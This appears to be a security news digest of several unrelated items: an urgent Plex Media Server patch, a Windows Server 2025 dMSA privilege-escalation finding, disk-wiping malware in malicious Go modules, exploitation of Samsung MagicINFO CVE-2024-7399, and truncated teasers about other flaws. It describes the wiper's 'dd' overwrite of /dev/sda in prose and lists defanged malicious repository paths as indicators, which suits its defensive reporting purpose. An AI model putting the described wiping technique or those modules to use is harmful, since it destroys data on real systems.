bleepingcomputer.com - Plex has notified some of its users on Thursday to urgently update their media servers due to a recently patched security vulnerability.
The company has yet to assign a CVE-ID to track the flaw and didn't provide additional details regarding the patch, only saying that it impacts Plex Media Server versions 1.41.7.x to 1.42.0.x.
Yesterday, four days after releasing security updates that addressed the mysterious security bug, Plex emailed those running affected versions to update their software as soon as possible.
"We recently received a report via our bug bounty program that there was a potential security issue affecting Plex Media Server versions 1.41.7.x to 1.42.0.x. Thanks to that user, we were able to address the issue, release an updated version of the server, and continue to improve our security and defenses," the company said in the email.
"You're receiving this notice because our information indicates that a Plex Media Server owned by your Plex account is running an older version of the server. We strongly recommend that everyone update their Plex Media Server to the most recent version as soon as possible, if you have not already done so."
Plex Media Server 1.42.1.10060, the version that patches this vulnerability, can be downloaded from the server management page or the official downloads page.
While Plex hasn't shared any details regarding the vulnerability so far, users are advised to follow the company's advice and patch their software before threat actors reverse engineer the patches and develop an exploit.
Although Plex has experienced its share of critical and high-severity security flaws over the years, this is one of the few instances where the company has emailed customers about securing their systems against a specific vulnerability.
In March 2023, CISA tagged a three-year-old remote code execution (RCE) flaw (CVE-2020-5741) in the Plex Media Server as actively exploited in attacks. As Plex explained two years earlier, when it released patches, successful exploitation can allow attackers to make the server execute malicious code.
While the cybersecurity agency didn't provide any information on the attacks exploiting CVE-2020-5741, they were likely linked to LastPass' disclosure that one of its senior DevOps engineers' computers had been hacked in 2022 to install a keylogger by abusing a third-party media software RCE bug.
The attackers exploited this access to steal the engineer's credentials and compromise the LastPass corporate vault, resulting in a massive data breach in August 2022 after stealing LastPass's production backups and critical database backups.
The same month, Plex also notified users of a data breach and asked them to reset passwords after an attacker gained access to a database containing emails, usernames, and encrypted passwords.
Akamai researcher Yuval Gordon discovered a privilege escalation vulnerability in Windows Server 2025 that allows attackers to compromise any user in Active Directory (AD).
The attack exploits the delegated Managed Service Account (dMSA) feature that was introduced in Windows Server 2025, works with the default configuration, and is trivial to implement.
This issue likely affects most organizations that rely on AD. In 91% of the environments we examined, we found users outside the domain admins group that had the required permissions to perform this attack.
Although Microsoft states they plan to fix this issue in the future, a patch is not currently available. Therefore, organizations need to take other proactive measures to reduce their exposure to this attack. Microsoft has reviewed our findings and approved the publication of this information.
In this blog post, we provide full details of the attack, as well as detection and mitigation strategies.
A supply-chain attack targets Linux servers with disk-wiping malware hidden in Golang modules published on GitHub.
The campaign was detected last month and relied on three malicious Go modules that included “highly obfuscated code” for retrieving remote payloads and executing them.
Complete disk destruction
The attack appears designed specifically for Linux-based servers and developer environments, as the destructive payload - a Bash script named done.sh, runs a ‘dd’ command for the file-wiping activity.
Furthermore, the payload verifies that it runs in a Linux environment (runtime.GOOS == "linux") before trying to execute.
An analysis from supply-chain security company Socket shows that the command overwrites with zeroes every byte of data, leading to irreversible data loss and system failure.
The target is the primary storage volume, /dev/sda, that holds critical system data, user files, databases, and configurations.
“By populating the entire disk with zeros, the script completely destroys the file system structure, operating system, and all user data, rendering the system unbootable and unrecoverable” - Socket
The researchers discovered the attack in April and identified three Go modules on GitHub, that have since been removed from the platform:
github[.]com/truthfulpharm/prototransform
github[.]com/blankloggia/go-mcp
github[.]com/steelpoor/tlsproxy
Arctic Wolf has observed exploitation in the wild of CVE-2024-7399 in Samsung MagicINFO 9 Server—a CMS used to manage and remotely control digital signage displays.
As of early May 2025, Arctic Wolf has observed exploitation in the wild of CVE-2024-7399 in Samsung MagicINFO 9 Server—a content management system (CMS) used to manage and remotely control digital signage displays. The vulnerability allows for arbitrary file writing by unauthenticated users, and may ultimately lead to remote code execution when the vulnerability is used to write specially crafted JavaServer Pages (JSP) files.
This high-severity vulnerability had originally been made public by Samsung in August 2024 following responsible disclosure by security researchers, with no exploitation reported at the time. On April 30, 2025, a new research article was published along with technical details and a proof-of-concept (PoC) exploit. Exploitation was then observed within days of that publication.
Given the low barrier to exploitation and the availability of a public PoC, threat actors are likely to continue targeting this vulnerability. Arctic Wolf will continue to monitor for malicious post-compromise activities related to this vulnerability, and will alert Managed Detection and Response customers as required when malicious activities are observed.
Microsoft has officially deprecated the Point-to-Point Tunneling Protocol (PPTP) and Layer 2 Tunneling Protocol (L2TP) in future versions of Windows Server, recommending admins switch to different protocols that offer increased security.
#Deprecated #L2TP #Microsoft #PPTP #Server #VPN #Windows
Progress Report Server Unauthenticated Remote Code Execution Chain
BMC&C Eclypsium Research has discovered and reported 3 vulnerabilities in American Megatrends, Inc. (AMI) MegaRAC Baseboard Management Controller (BMC) software. We are referring to these vulnerabilities collectively as BMC&C. MegaRAC BMC is widely used by many leading server manufacturers to provide “lights-out” management capabilities for their server products. Server manufacturers…
